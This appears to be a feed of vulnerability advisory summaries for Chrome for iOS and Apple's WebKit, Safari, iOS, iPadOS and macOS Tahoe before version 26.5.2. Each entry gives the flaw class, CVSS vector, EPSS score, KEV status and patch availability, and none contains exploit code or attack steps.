Navigation restriction bypass in Google Chrome for iOS (prior to 150.0.7871.47) permits a remote, unauthenticated attacker to circumvent client-side policy controls by delivering a crafted HTML page to a victim user. The flaw originates from insufficient policy enforcement (CWE-602), where navigation security logic enforced within the browser client can be subverted through malicious web content. No active exploitation has been identified - CISA KEV is not listed, SSVC confirms Exploitation: none, and the EPSS score of 0.22% (13th percentile) reflects minimal real-world exploitation activity at time of analysis.
Heap corruption in the iOSWeb component of Google Chrome for iOS before 150.0.7871.47 lets a remote attacker who lures a victim to a crafted HTML page potentially achieve memory corruption with high confidentiality, integrity, and availability impact. Chromium rated the underlying issue Critical severity, though the CVSS base score is 8.8 because exploitation requires user interaction (visiting a page). There is no public exploit identified at time of analysis, it is not on CISA KEV, and the EPSS probability is low at 0.21%.
Cross-origin information disclosure in Apple Safari, iOS, iPadOS, and macOS Tahoe (all versions before 26.5.2) allows an attacker who can direct a user to maliciously crafted web content to read sensitive data from other origins, violating the Same-Origin Policy. The flaw stems from inadequate tracking of security origins in the WebKit engine (CWE-346), and is notable because on iOS and iPadOS all browsers are mandated to use WebKit, meaning every browser on those platforms is affected. No public exploit or CISA KEV listing is identified at time of analysis; Apple has released patches across all affected platforms.
Memory corruption (CWE-119) in Apple Safari's web content processing engine causes an unexpected application crash when rendering maliciously crafted web content. Affected across Safari, iOS 26, iPadOS 26, and macOS Tahoe - all versions prior to 26.5.2. An unauthenticated remote attacker can trigger a denial-of-service against any user who visits a hostile page, though no code execution is indicated by current data. No public exploit code and no CISA KEV listing are identified at time of analysis; exploitation probability (EPSS) was not provided in source data.
Use-after-free memory corruption in Safari's web content rendering engine causes a denial-of-service crash on Apple platforms running Safari, iOS/iPadOS, and macOS Tahoe prior to version 26.5.2. An attacker who can lure a victim to visit a maliciously crafted webpage can reliably crash the Safari browser, with no code execution or data exfiltration indicated by the available CVSS impact scores (C:N/I:N). No public exploit code and no CISA KEV listing have been identified at time of analysis, placing this in the category of a significant but non-critical browser crash vulnerability.
Kernel memory corruption in Apple iOS/iPadOS (before 26.5.2) and macOS Tahoe (before 26.5.2) allows a malicious or compromised app to corrupt kernel memory or trigger unexpected system termination via malformed input that bypasses validation. Reported by Apple internally and fixed with improved input validation; no public exploit identified at time of analysis and the issue is not listed in CISA KEV. Despite a high CVSS of 9.1, the practical attack surface is bound to code already executing on the device as an app.
Clipboard data disclosure in Apple Safari (and the shared WebKit engine on iOS, iPadOS, and macOS) before version 26.5.2 lets a malicious website silently read or hijack clipboard contents without user interaction or permission, rated CVSS 7.5 (confidentiality-only). Apple has shipped fixes in Safari 26.5.2, iOS/iPadOS 26.5.2, and macOS Tahoe 26.5.2, and the issue was reported internally by Apple. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV.
Processing maliciously crafted web content in Apple Safari, iOS/iPadOS, and macOS Tahoe (all versions prior to 26.5.2) triggers an improper memory handling flaw (CWE-119 buffer overflow) in the web content processing pipeline, resulting in an unexpected process crash. The attack vector is network-based requiring user interaction (UI:R per CVSS), and impact is confined to availability - no confidentiality or integrity compromise is described. No public exploit code has been identified at time of analysis, and this vulnerability does not appear in the CISA KEV catalog.
Use-after-free memory corruption in Safari's web content rendering engine causes an unexpected application crash when processing maliciously crafted web content. Affected are Apple Safari, iOS and iPadOS, and macOS Tahoe - all prior to version 26.5.2. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) confirms that a remote unauthenticated attacker can trigger this condition simply by luring a user to visit a hostile page, with impact limited to availability (process crash/DoS). No public exploit code identified and not listed in CISA KEV at time of analysis; vendor-released patches are available.
Safari, iOS/iPadOS, and macOS Tahoe expose process memory when the browser engine processes maliciously crafted web content, rooted in a CWE-119 improper memory buffer restriction (tagged Buffer Overflow). The CVSS vector (AV:N/AC:L/PR:N/UI:R/C:H) indicates a network-reachable, low-complexity attack requiring only that the victim visit or render attacker-controlled content, resulting in high confidentiality impact through memory leakage. No active exploitation has been confirmed in CISA KEV and no public proof-of-concept has been identified at the time of analysis; Apple has released patched versions (26.5.2) across all affected platforms.
Sandbox escape in Apple's WebKit/Safari web content engine allows a malicious website to process restricted web content outside the sandbox on Safari, iOS/iPadOS, and macOS prior to 26.5.2. Reported by Apple and classed as an improper access-control flaw (CWE-284), it requires a victim to load attacker-controlled content (UI:R) and carries CVSS 7.1 with a scope change, reflecting that breaking out of the sandbox crosses a security boundary. There is no public exploit identified at time of analysis and EPSS is low (0.16%), though CISA's SSVC framework rates the technique as automatable with partial technical impact.
Memory corruption in Apple's WebKit-based web content processing allows an unauthenticated remote attacker to crash the affected process by luring a user to visit a maliciously crafted webpage. Affected platforms include Safari, iOS, iPadOS, and macOS Tahoe, all prior to version 26.5.2. No public exploit code has been identified at time of analysis, and this CVE does not appear in the CISA KEV catalog; impact is limited to availability (process crash) with no confirmed confidentiality or integrity exposure.
Use-after-free memory corruption in Apple's WebKit browser engine causes an unexpected process crash when rendering maliciously crafted web content. Safari (all versions prior to 26.5.2), iOS and iPadOS (all versions prior to 26.5.2), and macOS Tahoe (all versions prior to 26.5.2) are affected across Apple's full consumer device ecosystem. No public exploit or CISA KEV listing exists at time of analysis; impact is confirmed as denial-of-service (process crash) only, with no confidentiality or integrity compromise.
Double free memory corruption in Apple's web content processing engine crashes the rendering process on iOS/iPadOS (pre-26.5.2) and macOS Tahoe (pre-26.5.2) when a device processes attacker-controlled web content. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) confirms network delivery with no authentication required, though a user must interact with the malicious content, and impact is limited to availability - no confidentiality or integrity compromise is indicated. No public exploit code and no CISA KEV listing exist at time of analysis, placing this in a lower active-risk tier despite the ubiquity of affected Apple platforms.
Use-after-free memory corruption in Safari's web content processing causes an unexpected application crash across Apple platforms. Affected are Safari, iOS, iPadOS, and macOS Tahoe prior to version 26.5.2; exploitation requires only that a user visits or loads maliciously crafted web content, making drive-by delivery via a malicious webpage the primary vector. Impact is confined to availability - a forced Safari crash (denial of service) - with no confirmed confidentiality or integrity consequences. No public exploit code or active exploitation has been identified at time of analysis.
Denial-of-service memory corruption in Apple's WebKit engine affects Safari, iOS/iPadOS, and macOS Tahoe before version 26.5.2, where processing maliciously crafted web content triggers an unexpected process crash. The CVSS vector scores only availability impact (A:H) with no confidentiality or integrity loss, indicating a crash rather than code execution. There is no public exploit identified at time of analysis, and the EPSS probability is very low (0.16%), consistent with a browser-rendering DoS reported internally by Apple rather than an actively exploited threat.
Use-after-free in Safari's web content processing engine causes denial of service across Apple platforms, affecting Safari, iOS/iPadOS, and macOS prior to the 26.5.2 release line. The CVSS vector (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) confirms remote, unauthenticated triggering requiring only that a user visit attacker-controlled web content, with impact limited to availability - specifically an unexpected Safari crash. No active exploitation has been confirmed (not listed in CISA KEV), and no public exploit code has been identified at time of analysis.
Memory corruption via use-after-free in Apple's WebKit browser engine allows remote attackers to corrupt memory when a victim processes maliciously crafted web content on Safari, iOS/iPadOS, or macOS prior to 26.5.2. The CVSS 3.1 score of 8.8 reflects network-reachable exploitation requiring only that a user open a malicious page; no public exploit is identified at time of analysis and the issue is not listed in CISA KEV. Successful exploitation typically serves as the initial stage of a browser-based attack chain (often paired with a sandbox escape) to achieve code execution in the renderer.
Local privilege escalation and kernel memory corruption in Apple iOS, iPadOS (before 26.5.2) and macOS Tahoe (before 26.5.2) allows a malicious or compromised app to write kernel memory or force unexpected system termination by supplying improperly validated input to a privileged interface. Apple resolved the flaw through improved input sanitization. There is no public exploit identified at time of analysis, EPSS is low (0.18%, 8th percentile), and CISA SSVC records exploitation status as none, though it rates the technical impact as total and considers it automatable.
Path traversal (CWE-22) in Apple's WebKit-based browser engine exposes sensitive user information when processing maliciously crafted web content in Safari, iOS, iPadOS, and macOS Tahoe prior to version 26.5.2. The CVSS vector (AV:N/AC:L/PR:N/UI:R) confirms that an unauthenticated remote attacker needs only to induce a user to visit a malicious page, with no authentication or elevated privileges required. Apple has released fixes across all three platforms; no public exploit or CISA KEV listing has been identified at time of analysis.
Cross-origin data exfiltration in Apple Safari, iOS/iPadOS, and macOS Tahoe (all versions prior to 26.5.2) allows a malicious website to read data belonging to a different origin due to insufficient input validation. The CVSS vector (AV:N/AC:L/PR:N/UI:R) confirms the attack is network-delivered without authentication, requiring only that the victim visits an attacker-controlled page. No public exploit code or CISA KEV listing has been identified at time of analysis, and vendor-released patches are available for all affected platforms.
Out-of-bounds read in Apple's web content processing engine (WebKit) causes a browser process crash when a user visits a maliciously crafted webpage, affecting Safari, iOS/iPadOS, and macOS Tahoe. All versions prior to the 26.5.2 releases across those platforms are affected, making this a broad-surface denial-of-service vulnerability against Apple's default browser ecosystem. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in CISA KEV; however, the low attack complexity and zero-authentication requirement lower the bar for opportunistic abuse once a malicious page is visited.
Safari's web content processing engine on iOS, iPadOS, and macOS Tahoe contains an out-of-bounds write (CWE-787) that causes an unexpected crash when rendering maliciously crafted web content. All Safari versions prior to 26.5.2 - and the underlying WebKit engine shipping with iOS/iPadOS and macOS Tahoe prior to 26.5.2 - are affected. Apple has released patched versions across all three platforms; no public exploit code or CISA KEV listing has been identified at time of analysis, and available impact is limited to a denial-of-service crash with no confirmed code execution path.
Use-after-free memory corruption in Apple Safari (and the broader iOS/iPadOS/macOS Tahoe platform) allows a malicious web extension to trigger an unexpected process crash, resulting in a denial-of-service condition. Affected versions span all Safari, iOS/iPadOS, and macOS Tahoe releases prior to 26.5.2, with Apple-confirmed fixes available across all three platforms. No active exploitation is confirmed (not listed in CISA KEV) and no public exploit code has been identified at time of analysis; the high attack complexity and requirement for a pre-installed malicious extension meaningfully constrain real-world risk.
Memory corruption via type confusion in Apple's WebKit browser engine allows attackers to corrupt memory by luring a victim to maliciously crafted web content, affecting Safari, iOS/iPadOS, and macOS before version 26.5.2. The flaw (CWE-843) is network-reachable but requires user interaction (visiting a page), and no public exploit has been identified at time of analysis. Apple has shipped patches across Safari 26.5.2, iOS/iPadOS 26.5.2, and macOS Tahoe 26.5.2.
Sensitive data leakage in Apple Safari, iOS/iPadOS, and macOS Tahoe before version 26.5.2 exposes users to cross-site data disclosure when visiting a malicious or compromised website. The root cause is a permissions enforcement deficiency (CWE-1264) that allows a web context to access data beyond its intended permission boundary. No active exploitation has been confirmed by CISA KEV, and the EPSS score of 0.17% (6th percentile) indicates low observed exploitation probability at time of analysis; however, the unauthenticated, low-complexity network vector makes this a realistic target for drive-by attacks once details become public.
Use-after-free memory corruption in Apple's WebKit engine causes unexpected process crashes when processing maliciously crafted web content. Affected platforms include Safari, iOS 26, iPadOS 26, and macOS Tahoe - all versions prior to 26.5.2. An unauthenticated remote attacker can trigger a denial-of-service condition by luring a user to a malicious web page; no public exploit has been identified at time of analysis, and this vulnerability is not listed in the CISA KEV catalog.
Use-after-free memory corruption in WebKit's web content processing causes unexpected process crashes across Safari, iOS, and iPadOS on all versions prior to 26.5.2. An unauthenticated remote attacker who can lure a user to visit a maliciously crafted web page can trigger this condition, resulting in a denial-of-service via browser process termination. No public exploit code has been identified at time of analysis and the vulnerability is absent from CISA KEV, though the use-after-free class in WebKit has historically been chained with other primitives to escalate impact.